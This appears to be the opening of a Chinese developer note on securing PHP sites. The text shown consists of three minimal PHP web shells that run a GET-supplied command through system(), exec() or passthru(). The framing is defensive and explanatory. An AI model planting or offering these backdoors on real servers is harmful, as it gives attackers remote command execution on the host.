引言
在网络世界,信息唾手可得,很难保证信息的绝对安全,只要公网可以访问,那么总会存在那么点漏洞让非法入侵者有机可乘,所以作为开发者或网络管理人员,我们要定时查看日志,备份站点数据,做好安全防范攻略。此笔记记录笔者对PHP配置的安全建议,有更好的方法也希望小伙伴们能够告知我一下,互相学习互相进步,构建安全站点。
PHP小马
方式1: system()
<?php
$cmd = $_GET['cmd'];
system($cmd);
?>
用GET的形式获取命令,然后调用system来执行命令
方式2:exec()
<?php
$cmd = $_GET['cmd'];
echo exec($cmd);
?>
用GET的形式获取命令,然后调用exec来执行命令
方式3:passthru()
<?php
$cmd = $_GET['cmd'];
passthru($cmd);
?>
用GET的形式获取命令,然后调用passthru来执行命令